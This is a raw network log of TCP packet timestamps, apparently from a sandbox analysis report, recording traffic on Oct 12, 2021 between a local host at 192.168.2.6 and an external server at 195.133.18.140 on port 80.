Oct 12, 2021 12:35:34.658305883 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658332109 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658360958 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.658361912 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658390045 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.658391953 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658416033 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658438921 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658457994 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658478022 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658495903 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658514023 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658531904 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658550024 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658567905 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658586025 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658603907 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658623934 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658643007 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658660889 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658679008 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658698082 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658715963 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658735037 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658754110 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658772945 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658792019 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658811092 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658828974 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658848047 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658866882 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658885002 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658911943 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658938885 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658946991 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.658952951 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.658966064 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.658992052 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659019947 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659049988 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659079075 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659146070 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659224033 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.659254074 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659269094 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.659296989 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659329891 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659332991 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.659365892 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.659365892 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659399986 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659409046 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.659430981 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659446001 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.659466028 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659492970 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.659498930 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659512997 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.659538031 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659548044 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.659574032 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659579992 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.659605980 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659631968 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.659640074 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659676075 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659691095 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.659712076 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659744978 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.659744978 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659780025 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659781933 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.659806013 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.659818888 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659846067 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.659854889 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659868956 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.659889936 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659903049 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.659929037 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659961939 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.659965992 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.659991980 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.660016060 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.664848089 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.665210962 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.691845894 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.691888094 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.691919088 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.691936970 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.691962004 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.691984892 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.692004919 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.692024946 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.692044973 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.692053080 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.692065954 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.692086935 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.692107916 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.692132950 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.692150116 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.692151070 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.692171097 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.692192078 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.692194939 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.692212105 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.692234993 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.692236900 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.692260027 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.692266941 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:34.692277908 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:34.692321062 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:35.283533096 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:35.283816099 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.127759933 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.157068014 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.157100916 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.157121897 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.157136917 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.157152891 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.157167912 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.157191992 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.157210112 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.157218933 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.157232046 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.157255888 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.157278061 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.157284975 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.157304049 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.157320976 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.157324076 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.157341957 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.157346010 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.157347918 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.157368898 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.157388926 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.157388926 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.157397985 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.158083916 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.185580015 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.185619116 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.185640097 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.185658932 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.185677052 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.185697079 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.185715914 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.185729980 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.185745955 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.185759068 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.185766935 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.185782909 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.185792923 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.185796022 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.185802937 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.185822010 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.185841084 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.185842037 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.185861111 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.185869932 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.185883999 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.185904026 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.185911894 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.185921907 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.185941935 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.185946941 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.185962915 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.185981989 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.185995102 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.186001062 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.186021090 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.186029911 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.186043978 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.186048985 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.186065912 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.186084986 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.186240911 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.187243938 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.211882114 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.211919069 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.211936951 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.211957932 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212116957 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.212208986 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212232113 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212249041 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212265015 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212280989 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212306023 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212327957 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212336063 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.212347984 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212371111 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212385893 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.212393999 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212407112 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.212414980 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212438107 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212462902 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212471962 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.212479115 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.212486982 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212512016 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212533951 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212555885 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212575912 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212596893 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212610006 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.212619066 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212641001 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212666035 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212670088 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.212680101 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.212688923 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212711096 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212733984 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212737083 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.212755919 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212774038 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.212775946 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212798119 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212819099 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212837934 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.212846994 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212856054 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.212871075 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212893009 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212909937 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.212914944 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212948084 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212964058 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.212979078 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.212986946 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.213001966 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.213011026 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.213037968 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.213059902 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.213061094 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.213069916 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.213085890 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.213109016 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.213129044 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.213130951 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.213151932 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.213170052 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.213175058 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.213196039 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.213211060 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.213218927 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.213232994 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.213315964 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.213324070 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.237945080 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.237987041 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.238008022 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.238029003 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.238049030 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.238054037 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.238075018 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.238128901 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.238204002 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.238812923 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.238847017 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.238871098 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.238899946 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.238951921 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.239587069 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.239619970 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.239644051 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.239662886 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.239675045 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.239685059 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.239706039 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.239729881 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.239753008 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.239762068 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.239773989 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.239782095 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.239795923 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.239816904 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.239823103 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.239839077 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.239859104 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.239864111 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.239881992 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.239900112 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.239922047 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.239928961 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.239940882 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.239963055 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.239970922 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.239984989 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.239995003 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.240010023 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240034103 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240051031 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240060091 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.240073919 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240096092 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240120888 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240128994 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.240144014 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240151882 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.240166903 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240189075 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240192890 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.240211010 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240232944 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240236044 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.240253925 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240276098 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240298986 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240299940 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.240324020 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240326881 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.240348101 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240354061 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.240372896 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240396023 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240397930 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.240420103 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240439892 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240449905 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.240463018 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240488052 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240490913 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.240513086 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240534067 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240540981 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.240556002 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240577936 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240600109 CEST	80	49749	195.133.18.140	192.168.2.6
Oct 12, 2021 12:35:36.240612984 CEST	49749	80	192.168.2.6	195.133.18.140
Oct 12, 2021 12:35:36.240619898 CEST	80	49749	195.133.18.140	192.168.2.6
